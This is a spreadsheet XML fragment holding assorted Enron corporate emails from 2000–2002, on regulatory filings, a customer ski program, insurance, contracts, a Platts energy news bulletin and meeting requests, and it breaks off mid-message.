    <t xml:space="preserve">how about 4:00?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Ina Rangel_x000D_
10/16/2000 11:03 AM_x000D_
To: John Arnold/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: John Arnold's PC_x000D_
_x000D_
John,_x000D_
When would be a good time for you.  After work maybe?_x000D_
_x000D_
Ina_x000D_
---------------------- Forwarded by Ina Rangel/HOU/ECT on 10/16/2000 11:02 AM _x000D_
---------------------------_x000D_
DON ADAM @ _x000D_
ENRON        _x000D_
10/16/2000 10:06 AM_x000D_
_x000D_
To: Ina Rangel/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: John Arnold's PC_x000D_
_x000D_
Ina,_x000D_
_x000D_
Could you please have John email you the directions to his house and when _x000D_
would be a good time to come by and install the equipment? Thanks._x000D_
_x000D_
Don_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 22 Jun 2001 02:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>AReM/WPTF Comments on Draft Decisions Regarding PX Credit and_x000D_
 Direct Access</t>
  </si>
  <si>
    <t>Dan Douglass has drafted joint comments for two coalitions in which Enron is _x000D_
a member -- Alliance for Retail Energy Markets and Western Power Trading _x000D_
Forum.  Robert, feel free to contact Dan directly with your comments.  Let me _x000D_
know your thoughts as well.  I am out of the office at a WPTF meeting. Dan is _x000D_
here as well. If you need to contact me, you can leave me a message on my _x000D_
office phone or try my cell (415 -- 902-4108), but I'm not sure the cell is _x000D_
working all the time._x000D_
_x000D_
Sue Mara_x000D_
Enron Corp._x000D_
Tel: (415) 782-7802_x000D_
Fax:(415) 782-7854_x000D_
----- Forwarded by Susan J Mara/NA/Enron on 06/22/2001 07:35 AM -----_x000D_
_x000D_
	"Dan Douglass" &lt;douglass@energyattorney.com&gt;_x000D_
	06/20/2001 10:59 PM_x000D_
		 _x000D_
		 To: "ARM" &lt;arem@electric.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Comments on Draft Decisions Regarding PX Credit and Direct Access_x000D_
_x000D_
_x000D_
_x000D_
Attached for your review and comment is my first draft of comments to be  _x000D_
filed on Monday with regard to the draft decisions of ALJ Barnett and  _x000D_
Commissioner Bilas.? Please review it carefully, as I have thrown in  _x000D_
everything I can think of on a rush basis, and it may require some _x000D_
significant  editing.? Pay particular attention to Section V dealing with _x000D_
Bilas' request  for parties to discuss alternatives to DA suspension.? The _x000D_
draft offers a  compromise to the DWR's concerns, as expressed in the _x000D_
Angelides memo.?  Also, notice that Section VI urges the Commission to _x000D_
bifurcate the DA and PX  credit issues, acting quickly on the first, if it _x000D_
must, but more leisurely on  the PX credit subject._x000D_
?_x000D_
Finally, I have a suggestion?in the form of a question.? How  would AReM _x000D_
members feel about making this a joint filing with WPTF?? There  is _x000D_
cross-membership between the two groups and the same issues would be raised  _x000D_
in the separate filings which I am otherwise prepared to draft.? This draft  _x000D_
would requires some modifications so as to refer to the "Joint Parties" as  _x000D_
opposed to solely mentioning AReM, and I might? add a section dealing more  _x000D_
explicitly with WPTF's contribution to getting the zero minimum bill _x000D_
stipulation  signed in the first place.? Otherwise, the document would stay _x000D_
much as it  is (subject to your input over the next few days, of course).? _x000D_
Please let  me know what you think asap, as I am already working on a WPTF _x000D_
draft.?  Incidentally, I will also be filing comments on behalf of ABAG which _x000D_
will  support the positions taken in the attached document, but I am not _x000D_
proposing  that ABAG also be a party to this filing.? Thanks for your help!?  _x000D_
Comments as soon as possible would be very much appreciated!_x000D_
?_x000D_
Dan_x000D_
?_x000D_
?_x000D_
Law Offices of Daniel W. Douglass_x000D_
5959 Topanga Canyon Blvd.? Suite  244_x000D_
Woodland Hills, CA 91367_x000D_
Tel:?? (818) 596-2201_x000D_
Fax:?  (818) 346-6502_x000D_
douglass@energyattorney.com_x000D_
_x000D_
?_x000D_
_x000D_
 - Blank Bkgrd.gif_x000D_
 - 6-25-01 AReM Comments - Draft 1.doc</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 05:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.palmer@enron.com', 'eric.thode@enron.com'})</t>
  </si>
  <si>
    <t>Re: 2001 ENA/EGM/EIM CUSTOMER SKI PROGRAM</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 11/30/2000 _x000D_
01:23 PM ---------------------------_x000D_
_x000D_
_x000D_
Raymond Bowen_x000D_
11/30/2000 12:18 PM_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc: Dorie Hitchcock/HOU/ECT@ECT, Mike McConnell/HOU/ECT@ECT, Jeffrey A _x000D_
Shankman/HOU/ECT@ECT, Jeffrey McMahon/HOU/ECT@ECT, John J _x000D_
Lavorato/Corp/Enron@Enron, Mark Frevert/NA/Enron@Enron, Greg _x000D_
Whalley/HOU/ECT@ECT _x000D_
Subject: Re: 2001 ENA/EGM/EIM CUSTOMER SKI PROGRAM  _x000D_
_x000D_
Dorie,_x000D_
I share Dave's skepticism._x000D_
_x000D_
Ray Bowen_x000D_
_x000D_
_x000D_
_x000D_
David W Delainey_x000D_
11/30/2000 11:26 AM_x000D_
To: Dorie Hitchcock/HOU/ECT@ECT_x000D_
cc: Mike McConnell/HOU/ECT@ECT, Jeffrey A Shankman/HOU/ECT@ECT, Raymond _x000D_
Bowen/HOU/ECT@ECT, Jeffrey McMahon/HOU/ECT@ECT, John J _x000D_
Lavorato/Corp/Enron@Enron, Mark Frevert/NA/Enron@Enron, Greg _x000D_
Whalley/HOU/ECT@ECT _x000D_
Subject: 2001 ENA/EGM/EIM CUSTOMER SKI PROGRAM_x000D_
_x000D_
Dorie, I have to question the effectiveness of this program.  Over the years, _x000D_
it appears that more spots are being filled by Enron people then customers. _x000D_
The effectiveness of this forum from a customer point of view is _x000D_
questionable.  I vote to kill it._x000D_
_x000D_
Please forgive the approach - but I would like to provoke a discussion with _x000D_
my partners._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 11/30/2000 _x000D_
11:20 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Dorie Hitchcock                           11/30/2000 06:40 AM_x000D_
	_x000D_
_x000D_
To: Sylvia S Pollan/HOU/ECT@ECT, Robyn Zivic/NA/Enron@Enron, Andrew H _x000D_
Lewis/HOU/ECT@ECT, Geoff Storey/HOU/ECT@ECT, Martin Cuilla/HOU/ECT@ECT, _x000D_
Patrice L Mims/HOU/ECT@ECT, Kevin Ruscitti/HOU/ECT@ECT, Kelli _x000D_
Stevens/HOU/ECT@ECT, Tom Donohoe/HOU/ECT@ECT, Joe Parks/Corp/Enron@ENRON, _x000D_
Janet H Wallis/HOU/ECT@ECT, Gary Bryan/HOU/ECT@ECT, Jill T _x000D_
Zivley/HOU/ECT@ECT, Brian Bierbach/NA/Enron@Enron, John Craig _x000D_
Taylor/HOU/ECT@ECT, Gary Hickerson/HOU/ECT@ECT, Daniel Reck/HOU/ECT@ECT, _x000D_
George McClellan/HOU/ECT@ECT, Mark Tawney/HOU/ECT@ECT, Jere C _x000D_
Overdyke/HOU/ECT@ECT, Larry Lawyer/NA/Enron@Enron, Brent A Price/HOU/ECT@ECT, _x000D_
Eric Gonzales/LON/ECT@ECT, Cindy Skinner/HOU/ECT@ECT, John L _x000D_
Nowlan/HOU/ECT@ECT, Don Schroeder/HOU/ECT@ECT, Doug Leach/HOU/ECT@ECT, Bryan _x000D_
Burnett/HOU/ECT@ECT, Wendy King/Corp/Enron@ENRON, Tim Battaglia@Enron, _x000D_
Douglas B Dunn/HOU/ECT@ECT, Rodney Malcolm/HOU/ECT@ECT, Billy _x000D_
Lemmons/Corp/Enron@ENRON, David Howe/Corp/Enron@ENRON, Mark _x000D_
Frevert/NA/Enron@Enron, John J Lavorato/Corp/Enron@Enron, David W _x000D_
Delainey/HOU/ECT@ECT, Mike McConnell/HOU/ECT@ECT, Jeffrey A _x000D_
Shankman/HOU/ECT@ECT, Jeffrey McMahon/HOU/ECT@ECT, Raymond Bowen/HOU/ECT@ECT, _x000D_
Jeffery Ader/HOU/ECT@ECT, Phillip K Allen/HOU/ECT@ECT, John _x000D_
Arnold/HOU/ECT@ECT, Edward D Baughman/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT, _x000D_
Tim Belden/HOU/ECT@ECT, Christopher F Calger/PDX/ECT@ECT, Wes _x000D_
Colwell/HOU/ECT@ECT, Derek Davies/CAL/ECT@ECT, Mark Dana Davis/HOU/ECT@ECT, _x000D_
Joseph Deffner/HOU/ECT@ECT, Paul Devries/TOR/ECT@ECT, Janet R _x000D_
Dietrich/HOU/ECT@ECT, Jeff Donahue/HOU/ECT@ECT, Stephen H _x000D_
Douglas/HOU/ECT@ECT, W David Duran/HOU/ECT@ECT, Chris H Foster/HOU/ECT@ECT, _x000D_
Mark E Haedicke/HOU/ECT@ECT, Rogers Herndon/HOU/ECT@ect, Scott _x000D_
Josey/Corp/Enron@ENRON, C John Thompson/Corp/Enron@ENRON, Fred _x000D_
Lagrasta/HOU/ECT@ECT, Eric LeDain/CAL/ECT@ECT, Laura Luce/Corp/Enron@Enron, _x000D_
Thomas A Martin/HOU/ECT@ECT, Jonathan McKay/CAL/ECT@ECT, Michael L _x000D_
Miller/NA/Enron@Enron, Rob Milnthorp/CAL/ECT@ECT, Jean Mrha/NA/Enron@Enron, _x000D_
Scott Neal/HOU/ECT@ECT, David Oxley/HOU/ECT@ECT, Ozzie Pagan/HOU/ECT@ECT, _x000D_
Beth Perlman/HOU/ECT@ECT, Kevin M Presto/HOU/ECT@ECT, Brian _x000D_
Redmond/HOU/ECT@ECT, Hunter S Shively/HOU/ECT@ECT, James D _x000D_
Steffes/NA/Enron@Enron, Fletcher J Sturm/HOU/ECT@ECT, Bruce _x000D_
Sukaly/Corp/Enron@Enron, Mike Swerzbin/HOU/ECT@ECT, Scott _x000D_
Tholan/Corp/Enron@Enron, Barry Tycholiz/CAL/ECT@ECT, Frank W _x000D_
Vickers/HOU/ECT@ECT, Greg Wolfe/HOU/ECT@ECT, Max Yzaguirre/NA/Enron@ENRON, _x000D_
John Zufferli/CAL/ECT@ECT, Deirdre McCaffrey/HOU/ECT@ECT, Jennifer _x000D_
Shipos/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: 2001 ENA/EGM/EIM CUSTOMER SKI PROGRAM_x000D_
_x000D_
Winter is just around the corner and the new ski season will be opening _x000D_
soon.  Please review the proposed information below, regarding the _x000D_
ENA/EGM/EIM Customer Ski Program, to help us determine what our needs will be _x000D_
for the 2001 season._x000D_
_x000D_
Location:  Beaver Creek, Colorado_x000D_
Preliminary Dates:  February 21 - March 14, 2001_x000D_
Approximate Cost Per Person:  $2,600 (based on 82 participants)_x000D_
_x000D_
The preliminary dates have been divided into 6 trips:_x000D_
TRIP	DATES	TOTAL # OF BEDS_x000D_
Trip 1	Wed, February 21 - Sat, February 24	11_x000D_
Trip 2	Sun, February 25 - Wed, February 28	17_x000D_
Trip 3	Wed, February 28 - Sat, March 3	13_x000D_
Trip 4	Sun, March 4 - Wed, March 7	13_x000D_
Trip 5	Wed, March 7 - Sat, March 10	13_x000D_
Trip 6	Sun, March 11 - Wed, March 14	15_x000D_
_x000D_
The program cost per person includes:_x000D_
? Four days/three nights accommodations in luxurious private homes in the _x000D_
premier Holden Road/Borders Road area of Beaver  Creek with daily maid service_x000D_
? Animated invitation with on-line registration_x000D_
? Round-trip airport ground transportation_x000D_
? Experienced property hosts_x000D_
? Daily lift tickets and ski instruction_x000D_
? Ski equipment rental_x000D_
? Catered dinner two nights_x000D_
? Catered breakfast daily_x000D_
? Off-site dinner coordination_x000D_
? Alternate activity coordination_x000D_
? Private vans at each house_x000D_
? One massage with experienced in-house massage therapists_x000D_
? Enron promotional gift item_x000D_
? Pre-program administration and coordination_x000D_
? On-site operation_x000D_
_x000D_
If you are interested in participating in the 2001 ski program, please submit _x000D_
an email  request to me no later than Friday, December 8th, including the _x000D_
following information:_x000D_
Name_x000D_
Company_x000D_
Department_x000D_
Telephone_x000D_
Fax_x000D_
Number of People_x000D_
Choice of Dates (1st, 2nd &amp; 3rd)_x000D_
Company #_x000D_
RC #_x000D_
_x000D_
The week of December 11th, all requests will be compiled for review and final _x000D_
approval._x000D_
_x000D_
Questions should be directed to my attention at (713) 853-6978.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 03:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Rod has covered all of the angles. He works closely with corp. insurance _x000D_
folks; _x000D_
and from time to time we've entertained the idea of bidding out the service._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jerry Peters_x000D_
12/13/2000 11:32 AM_x000D_
To: Rod Hayslett/FGT/Enron@ENRON, James Saunders/FGT/Enron@ENRON_x000D_
cc: John Jesse/NPNG/Enron@Enron _x000D_
_x000D_
Subject: Re: Insurance Claims_x000D_
_x000D_
Actually, I am not sure NPNG currently has a lot of expertise in this area.  _x000D_
I have asked John to evaluate whether corporate should handle NBPL's _x000D_
insurance needs.  We have Jim Menning, spending about 75% of his time on _x000D_
insurance so I am hopeful that a move to corporate could reduce our costs - _x000D_
but obviously eliminating 0.75 FTEs is minor compared to the effect (plus or _x000D_
minus) of a change in direct insurance premiums or allocated insurance _x000D_
costs.  Do either of you have experience or information that would support _x000D_
either side, i.e. directly manage ETS insurance function or outsource it all _x000D_
to corporate?_x000D_
---------------------- Forwarded by Jerry Peters/NPNG/Enron on 12/13/2000 _x000D_
11:25 AM ---------------------------_x000D_
_x000D_
_x000D_
James Saunders_x000D_
12/13/2000 08:57 AM_x000D_
To: Rod Hayslett/FGT/Enron@ENRON_x000D_
cc: Jerry Peters/NPNG/Enron@ENRON _x000D_
_x000D_
Subject: Re: Insurance Claims  _x000D_
_x000D_
Any chance at  all that we can use Northern Plains/NBPL insurance expertise _x000D_
to find a solution for ETS increases???_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Nov 2000 07:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Updated Power Watchlist</t>
  </si>
  <si>
    <t xml:space="preserve">Attached please find an updated power credit watchlist dated 11/27/00.  _x000D_
Please direct any comments/questions to the credit hotline, (713) 853-1803_x000D_
_x000D_
Veronica Gonzalez_x000D_
</t>
  </si>
  <si>
    <t>Wed, 22 Aug 2001 09:11:40 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'elberg.gelin@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'john.cobb@enron.com'})</t>
  </si>
  <si>
    <t>NNG Storage Assets</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hi John,_x000D_
_x000D_
We spoke earlier this morning about obtaining the value of storage assets owned by ETS/NNG.  Specifically, I would like to have information on the:_x000D_
_x000D_
Original cost of the assets_x000D_
Cost as in the rate base_x000D_
Replacement cost_x000D_
Current Value_x000D_
Depreciation (schedule, method, etc.)_x000D_
Cost Allocation_x000D_
Rate Design_x000D_
Age of the Asset _x000D_
Expected remaining life of the assets_x000D_
_x000D_
and if possible the cost and revenue by location.  As far as the time frame, we would like to have the information by the end of the week, however considering your move to Three Allen Center on Friday that may not be feasible.  Instead, after initially looking into this, maybe you can give me an estimated time frame as to when you can gather this information._x000D_
_x000D_
I will contact Bob Chandler this afternoon and see if he can assist me in obtaining NNG financial statements and any other infomation on ETS/NNG's storage assets._x000D_
_x000D_
Thank you,_x000D_
_x000D_
E. Mike Gelin _x000D_
ETS Asset Development Group_x000D_
X - 54917_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'aosawa@attglobal.net'})</t>
  </si>
  <si>
    <t>frozenset({'krice@enron.com', 'klay@enron.com'})</t>
  </si>
  <si>
    <t>Fw: Looking for eMarket</t>
  </si>
  <si>
    <t>Dear Mr. kenneth L. Lay :_x000D_
        Mr. Kenneth D. Rice :_x000D_
_x000D_
I joined press conference on October 31 in Tokyo._x000D_
_x000D_
I would like to know more about Enron Online, because many Japanese_x000D_
equipment, component and material manufacturers are interested in and know._x000D_
_x000D_
Now I am moving by business trip in the U.S.A. and I will go to Houston on_x000D_
November 14 and 15. I would like to meet with business development,_x000D_
marketing, or sales people in Enron Online. I appreciate if you or anybody_x000D_
make an arrangement to meet._x000D_
_x000D_
I am lookingforward to your kind response._x000D_
_x000D_
_x000D_
----- Original Message -----_x000D_
From: "aosawa" &lt;aosawa@attglobal.net&gt;_x000D_
To: &lt;help@enrononline.com&gt;_x000D_
Sent: Thursday, October 26, 2000 7:31 PM_x000D_
Subject: Fw: Looking for eMarket_x000D_
_x000D_
_x000D_
&gt; Re-send_x000D_
&gt;_x000D_
&gt; ----- Original Message -----_x000D_
&gt; From: "aosawa" &lt;aosawa@attglobal.net&gt;_x000D_
&gt; To: &lt;help@enrononline.com&gt;_x000D_
&gt; Sent: Monday, October 23, 2000 9:06 PM_x000D_
&gt; Subject: Fw: Looking for eMarket_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; &gt; Marketing / Sales people :_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Dear Sir or Madam :_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; We Fuji Keizai is one of the largest marketing consultant company in_x000D_
&gt; &gt; Japan._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; We are looking for eMarket place in the U.S.A.  to corroborate with_x000D_
our_x000D_
&gt; &gt; &gt; client._x000D_
&gt; &gt; &gt; Our clients ; manufacturers, distributor, retailer, and SI_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Most of Japanese companies try to enter to eMarket place in this_x000D_
couple_x000D_
&gt; of_x000D_
&gt; &gt; &gt; month. But most of them don't know about detail of eMarket place._x000D_
&gt; &gt; &gt; We know your eMarket place is leading site in industries._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; I will visit to the U.S.A. in November for business trip. If any_x000D_
&gt; marketing_x000D_
&gt; &gt; /_x000D_
&gt; &gt; &gt; sales people are available in November 6 to 17, I would like to visit_x000D_
&gt; you._x000D_
&gt; &gt; I_x000D_
&gt; &gt; &gt; would like to make an appointment._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; I am looking forward your kind and quick response._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Sincerely Yours,_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Fuji Keizai Co., Ltd._x000D_
&gt; &gt; &gt; International Marketing Dept._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Akihiro Osawa_x000D_
&gt; &gt; &gt; Marketing Manager_x000D_
&gt; &gt; &gt; TEL  81-3-3664-5821    FAX  81-3-3661-9514_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt;</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 08:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'robert.sevitz@enron.com', 'fred.kelly@enron.com', 'john.rigby@enron.com', 'peter.nassab@enron.com', 'jude.rolfes@enron.com', 'richard.leibert@enron.com'})</t>
  </si>
  <si>
    <t>Cost plus contract for Co Op City</t>
  </si>
  <si>
    <t xml:space="preserve">As a follow up to my previous e-mail, here is the second request, which was _x000D_
in my opinion adequately addressed by John Schwartzenburg.  _x000D_
I am frustrated with beginning the process over again.  _x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 02/06/2001 04:33 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
02/01/2001 12:06 PM_x000D_
To: David Lund/ENRON@enronXgate, John _x000D_
Schwartzenburg/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John G _x000D_
Rigby/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Peter Nassab/Corp/Enron@Enron_x000D_
cc: Mark Bernstein/HOU/ECT@ECT, Jude _x000D_
Rolfes/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Cost plus contract for Co Op City_x000D_
_x000D_
Gentlemen,_x000D_
_x000D_
As Dave and John know, I'm working on a deal for ENA (and with Jude) which _x000D_
has as one aspect a cost plus EPC contract for the construction of a power _x000D_
plant.  We need to put together the T's and C's for a cost plus contract, and _x000D_
since it is possible that NEPCO might be the contractor, I wanted to use _x000D_
something that is acceptable to NEPCO.  I will then take the laboring oar in _x000D_
order to get a working draft prepared for this project._x000D_
_x000D_
As always, I'm on a short time frame, so your response would be appreciated._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 13:42:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.shelk@enron.com', 'd..steffes@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Do we need to specifically rebut this?  Enron did file a study to support the natural markets of the SE, and, while we generally have stated responses to his issues in various forums, do we need to respond item by item?  (FYI--I have never heard the "lake" analogy before -- his characterization of it as the opponent position helps his case, but it is incorrect because as far as I know, there is no one proposing a system that ignores constraints)._x000D_
_x000D_
Also, we have not focused much recently on the transmission pricing issues.  This may be an opportunity to discuss this in context.  He seems to use it as a reason against the Southeast RTO. _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shelk, John  _x000D_
Sent:	Monday, October 15, 2001 4:08 PM_x000D_
To:	Shapiro, Richard; Steffes, James D.; Nicolay, Christi L._x000D_
Cc:	Robertson, Linda; Novosel, Sarah_x000D_
Subject:	FW: Southern Co.'s Testimony_x000D_
_x000D_
	_x000D_
_x000D_
Below is a link to Southern Co. CEO Allen Franklin's prepared testimony at the Barton hearing last week (October 10).  He says they favor wholesale competition, but he then goes on to talk about the virtues of geographically smaller RTOs, with a phased approach of smaller RTOs that could later merge to become larger (although the Barton discussion draft would prevent such mergers).  The statement also chronicles their involvement in the Southeast mediation process._x000D_
_x000D_
In his oral testimony, Franklin kept ephasizing the lack of FERC cost/benefit studies on RTOs and the similar (alleged) lack of studies and analysis to support the 4 RTO model._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nersesian, Carin  _x000D_
Sent:	Monday, October 15, 2001 4:59 PM_x000D_
To:	Shelk, John_x000D_
Subject:	Southern Co.'s Testimony_x000D_
_x000D_
http://energycommerce.house.gov/107/hearings/10102001Hearing387/Franklin647.htm_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 24 Jan 2000 08:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'colleen.sullivan@enron.com', 'billy.lemmons@enron.com', 'stacy.dickson@enron.com', 'dick.jenkins@enron.com', 'ed.mcmichael@enron.com', 'scott.neal@enron.com', 'chris.germany@enron.com', 'robin.barbe@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">  Per Jeff Hodge._x000D_
_x000D_
Here is an initial draft of an Agreement to finalize the retail issues.  _x000D_
Please note that I have not included anything on gas buy back yet.  I would _x000D_
like to get some confirmation on that issue before drafting._x000D_
_x000D_
Otherwise, your thoughts and comments will be appreciated.  I look forward to _x000D_
hearing from you._x000D_
</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 02:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Public Service Co.  Amendment</t>
  </si>
  <si>
    <t xml:space="preserve">Paul,  Attached is a draft of the Temporary Assignment and Amended of the _x000D_
Sandia Agreement.  Please review.  Sorry for the delay._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 16 Jan 2002 07:19:08 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'energybulletin@platts.com'})</t>
  </si>
  <si>
    <t>frozenset({'platts@listserv.platts.com'})</t>
  </si>
  <si>
    <t>Platts Energy Bulletin</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
_x000D_
_x000D_
Platts Energy Bulletin_x000D_
_x000D_
_x000D_
Platts welcomes Energy Insight readers to Platts Energy Bulletin. For Platts_x000D_
Premium customers go to www.einsight.com (http://www.einsight.com) to pick up_x000D_
your Platts Energy Insight subscription. Your password and login will remain the_x000D_
same._x000D_
_x000D_
The daily Energy Bulletin is a showcase of the top headlines posted on_x000D_
platts.com (http://www.platts.com) over the past 24 hours. To view this file in_x000D_
html, open the attachment at the bottom of this email. We welcome your feedback_x000D_
- send your comments to feedback@platts.com_x000D_
_x000D_
Instructions for unsubscribing can be found at the bottom of each issue._x000D_
_x000D_
Jan 16, 2002_x000D_
_x000D_
What's New on platts.com?_x000D_
Platts Enron Report: Read about the implications of Enron's bankruptcy on the_x000D_
financial and energy communities._x000D_
(http://www.platts.com/features/enron/index.shtml)_x000D_
_x000D_
Saudi Arabia: Bin Laden's Challenge: For Osama bin Laden, the alleged_x000D_
perpetrator of the terrorist assault on America Sep 11, the ultimate target was_x000D_
not the United States but Saudi Arabia._x000D_
(http://www.platts.com/features/binladen/index.shtml)_x000D_
_x000D_
_x000D_
_x000D_
Futures Round-up_x000D_
IPE Brent Focus: IPE Brent crude falls on bearish API data_x000D_
Front-month February futures, which expire later Wednesday, gapped lower in ETS_x000D_
electronic trading, and traded at $19.04/bbl at 1046 GMT, 66 cts off Tuesday's_x000D_
settlement. March had slipped by 51 cts at the same time to trade at $18.47/bbl._x000D_
_x000D_
News Round-up_x000D_
Click on the headlines below or paste the URLs provided in your internet browser_x000D_
to see the full story._x000D_
_x000D_
ADVERTISEMENT:_x000D_
Platts Global Energy Jobs Board and Resume Bank: Created in partnership with the_x000D_
Energy Jobs Network, the Jobs Board gives you access to a pool of job seekers_x000D_
and open positions across the energy industry. It's free for all job seekers,_x000D_
and there is a range of packages for employers posting jobs._x000D_
(http://www.energyjobsnetwork.com/home.asp?code=platts)_x000D_
_x000D_
_x000D_
_x000D_
OIL:_x000D_
World community readies Afghanistan as energy player_x000D_
The international community is readying Afghanistan to be a player on the energy_x000D_
scene, with attention these days focused on the energy potential of Central Asia_x000D_
and the role of Afghanistan as a possible producer as well as a pipeline route_x000D_
from the Caspian to oil and gas-hungry markets._x000D_
(http://www.platts.com/archives.shtml#57758)_x000D_
_x000D_
NATURAL GAS:_x000D_
Gazprom welcomes prospect of higher Russian gas prices_x000D_
The CEO of Russian gas monopoly Gazprom Alexei Miller Tuesday welcomed the_x000D_
prospect of higher domestic gas tariffs in 2002, saying that higher prices would_x000D_
help the company meet its Rb140.8-bil ($4.69-bil) investment target this year._x000D_
(http://www.platts.com/archives.shtml#57779)_x000D_
_x000D_
PETROCHEMICALS:_x000D_
Qatar QAFAC confirms MTBE plant shutdown from Jan 14_x000D_
The Qatar Fuel Additives Company has shut down its 610,000 mt/yr MTBE plant on_x000D_
Monday as scheduled, a company source confirmed Wednesday._x000D_
(http://www.platts.com/archives.shtml#57769)_x000D_
_x000D_
ADVERTISEMENT:_x000D_
Platts Buyers' Guide: One online place for the electric power industry to_x000D_
search, compare and find the products and services you need. Click to add your_x000D_
listing. (http://www.mediabrains.com/client/platts/bg1/search.asp)_x000D_
_x000D_
_x000D_
ELECTRIC POWER:_x000D_
South Korea to begin power sector privatization in H1 2002_x000D_
South Korea's Ministry of Commerce, Industry and Energy said in a statement_x000D_
Wednesday it plans to start privatization of the Korea Electric Power Corp in_x000D_
the first half of year 2002. (http://www.platts.com/archives.shtml#57763)_x000D_
_x000D_
NUCLEAR:_x000D_
Germany earmarks extra $25-mil for Chernobyl nuke_x000D_
The German government is to donate a further $25-mil towards safety provisions_x000D_
at Ukraine's Chernobyl nuclear power station, the environment ministry said_x000D_
Wednesday. (http://www.platts.com/archives.shtml#57780)_x000D_
_x000D_
COAL:_x000D_
PG&amp;E considers Salem Harbor sale_x000D_
US' PG&amp;E National Energy Group is taking offers of interest on about 1,830 MW of_x000D_
generation, including the company?s four-unit, coal-fired 750-MW Salem Harbor_x000D_
station. (http://www.platts.com/archives.shtml#57740)_x000D_
_x000D_
Want more information on Platts products? Browse the Platts Infostore at_x000D_
http://www.platts.com/mhe_infostore/cgi-bin/infostore._x000D_
_x000D_
You can also email Platts sales team at info@platts.com or check for the details_x000D_
of your nearest sales representative in our list of Platts offices at_x000D_
http://www.platts.com/about/offices.shtml._x000D_
_x000D_
For information on how to advertise on the Platts Energy Bulletin or on_x000D_
platts.com contact josie_parnell@platts.com._x000D_
_x000D_
To email an editor, click on_x000D_
http://www.platts.com/oil/editorialquestions.shtml?EnergyBulletin_x000D_
_x000D_
_x000D_
_x000D_
To unsubscribe from the Energy Bulletin, please send an email to_x000D_
listserv@listserv.resdata.com and type the words UNSUBSCRIBE PLATTS in the body_x000D_
of your message. You should receive a response telling you that you have been_x000D_
unsubscribed. If you are experiencing problems, email us at feedback@platts.com._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Sep 2000 03:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sjbeebe@donohue.ca'})</t>
  </si>
  <si>
    <t>BBQ pork...... let me think???????  Oh yeah ! we're in!</t>
  </si>
  <si>
    <t>Thu, 4 Oct 2001 10:19:34 -0700 (PDT)</t>
  </si>
  <si>
    <t>Career Opportunity: Marketing Manager with GoTo in Pasadena, CA.</t>
  </si>
  <si>
    <t>Dear Alumni,_x000D_
_x000D_
